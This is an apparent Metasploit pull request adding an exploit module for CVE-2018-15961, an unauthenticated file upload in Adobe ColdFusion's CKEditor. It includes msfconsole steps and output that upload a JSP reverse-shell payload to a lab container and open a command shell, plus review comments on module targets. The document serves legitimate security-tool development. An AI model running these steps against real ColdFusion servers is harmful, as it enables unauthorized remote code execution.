### PR TITLE
Coldfusion ckeditor file upload

### PR DESCRIPTION
**Pull request by Qazeer**
**New pull request from an unique branch (coldfusion_ckeditor_file_upload) as requested.
Integrates RootUp and bcoles' comments from the previous pull request.**

--
Hello everyone,

This module exploit the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerabilty goes by CVE-2018-15961.

The exploitation is pretty basic, a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

### Output
msf > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[] Started reverse TCP handler on 172.17.0.1:4444
[] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

### Verification
msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

### TODO
Should be working on Windows and Adobe 2016 as the URL used do not change but not tested.

### CODE REVIEW

**Comment by bcoles** [comment]
Please add some module [documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation) for this module.

* [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
* [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)

File: modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,106 @@
...
+      'References'      =>
+        [
+          [ "CVE", "2018-15961" ],
+          [ "BID", "105314" ],
+          [ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
+        ],
+      'Privileged'      => false,
+      'Stance'          => Msf::Exploit::Stance::Aggressive,
+      'Platform'        => ['win', 'linux'],
+      'Targets'        =>
```
Comment (bcoles) [inline modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb]: The Java payload is platform agnostic, so you should be able to forgo having separate targets, and instead do this:

```ruby
          [ 'Java Universal',
            {
                'Arch' => ARCH_JAVA,
                'Platform' => 'java'
            },
          ]
```

Take a look at `grep -rn ".jsp" modules/exploits/multi/ | grep upload` for a bunch of examples.

If you want to support multiple targets, take a look at [struts_code_exec_exception_delegator](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb) or [openfire_auth_bypass](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/multi/http/openfire_auth_bypass.rb) as examples which supports the above universal target, plus a target for windows and a target for linux. They aren't JSP file upload exploits, but are similar in principle.

**Comment by jrobles-r7** [comment]
@msjenkins-r7 test this please.

**Comment by jrobles-r7** [comment]
## Release Notes

The exploit/multi/http/coldfusion_ckeditor_file_upload module exploits an unauthenticated file upload vulnerability in the CKEditor of Adobe ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release) to upload and execute JSP files.

**Pull request merged**